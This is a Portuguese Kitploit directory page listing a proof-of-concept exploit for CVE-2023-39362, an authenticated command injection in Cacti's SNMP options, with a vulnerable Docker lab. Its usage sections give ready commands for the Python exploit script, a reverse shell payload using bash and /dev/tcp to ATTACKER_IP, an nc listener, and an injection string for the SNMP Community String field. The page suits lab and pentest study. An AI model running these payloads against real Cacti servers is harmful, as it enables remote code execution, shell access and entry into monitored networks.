Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc — Prova de conceito de exploit para CVE-2023-39362, uma injeção de comandos autenticada nas opções de SNMP do Cacti. Inclui um ambiente Docker vulnerável para testes e um script em Python para exploração automatizada com capacidade de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingLabs e Prática
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

CVE-2023-39362-cacti-snmp-command-injection-poc

Prova de conceito de exploit para CVE-2023-39362, uma injeção de comandos autenticada nas opções de SNMP do Cacti. Inclui um ambiente Docker vulnerável para testes e um script em Python para exploração automatizada com capacidade de reverse shell.

Ver Repositório
24há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de injeção de comandos no Cacti (CVE-2023-39362) - PoC

Este repositório é um fork deste repositório: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

O Cacti é uma estrutura open-source de monitoramento operacional e gerenciamento de falhas, em constante evolução para atender às necessidades dinâmicas de sua comunidade de usuários.

Na versão 1.2.24, foi identificada uma potencial vulnerabilidade de segurança marcada como CVE-2023-39362. Sob condições específicas, um usuário privilegiado autenticado pode explorar uma falha nas opções SNMP de um Device, utilizando uma string maliciosa que leva à injeção de comandos. Essa exploração resulta na execução autenticada de código remoto no servidor subjacente.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

As implicações desta vulnerabilidade são graves, pois um agente mal-intencionado com privilégios autenticados poderia comprometer a integridade do servidor que hospeda o Cacti. Esse comprometimento poderia potencialmente servir como porta de entrada para acesso não autorizado a outros hosts dentro da rede, especialmente aqueles monitorados pelo Cacti.

Esta é uma aplicação vulnerável para testar o exploit da vulnerabilidade do Cacti (CVE-2023-39362).

AVISO!

Esta aplicação contém vulnerabilidades de segurança graves. Execute-a por sua conta e risco! É recomendado usar um ambiente com backup e isolado (como uma VM com snapshot recente e rede somente-host). Não envie esta aplicação para nenhum servidor exposto à Internet, pois eles serão comprometidos.

Aviso legal

Não me responsabilizo pela forma como qualquer pessoa usa esta aplicação. O único propósito desta aplicação é ser um cenário de teste para o exploit da CVE-2023-39362 e ela não deve ser usada de forma maliciosa. Se o seu servidor for comprometido por meio de uma instalação desta aplicação, a responsabilidade não é minha; é das pessoas que a enviaram e instalaram.**

Uso

1. Configure o ambiente

Aqui estão os passos para configurar o ambiente:

  1. Execute docker compose up -d para iniciar a composição.
  2. Você pode finalizar os passos acessando http://127.0.0.1/cacti para iniciar o assistente de inicialização do Cacti. Se você obtiver um erro relacionado ao banco de dados, espere um pouco e atualize a página.
  3. As credenciais padrão são admin/admin.
  4. Pressione "Next" em todos os botões durante o assistente, escolhendo as opções de acordo. Todos os padrões devem estar corretos e todos os pré-requisitos obrigatórios devem ser atendidos.
  5. Após a instalação, faça login como admin.
  6. Vá para "Console" > "Configuration" > "User".
  7. Clique no usuário guest.
  8. "Habilite" ele, defina uma senha, desative "Must Change Password at Next Login" se desejar.
  9. Clique no botão "Save".
  10. Vá para a seção "Permissions".
  11. Em "General Administration", habilite "Console Access" e "Sites/Devices/Data".
  12. Clique no botão "Save".
  13. Faça logout e entre novamente como guest para testar o exploit.

O guia oficial de instalação do Cacti pode ser encontrado aqui.

Para derrubar o ambiente, use o comando docker compose down.

2. Execute o script do exploit

(Este é apenas um caminho possível para a exploração)

Execute o comando no servidor remoto:

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

Abrindo um reverse shell:

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. Exploração manual

  1. Vá para "Console" > "Create" > "New Device".
  2. Crie um Device que suporte SNMP versão 1 ou 2.
  3. Garanta que o Device tenha Graphs com um ou mais templates de:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Criar o Device a partir do template "Net-SNMP Device" atenderá ao pré-requisito de Graphs)
  4. Em "SNMP Options", no campo "SNMP Community String", use um valor como este: public\' ; touch /tmp/proof ; \'.
  5. Clique no botão "Create".
  6. Verifique em /tmp a presença do arquivo criado.

Para obter um reverse shell, um payload como o seguinte pode ser usado.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Causa raiz

Uma causa raiz detalhada da vulnerabilidade está disponível no advisory de segurança original ou no post do blog do autor original.

Autores

  • Antonio Francesco Sardella - relator da vulnerabilidade - m3ssap0
  • Akos Jakab - automatizou a exploração por meio de um script Python - jakabakos

Licença

Este projeto está licenciado sob a Unlicense - consulte o arquivo LICENSE para obter detalhes.

Baixar ferramenta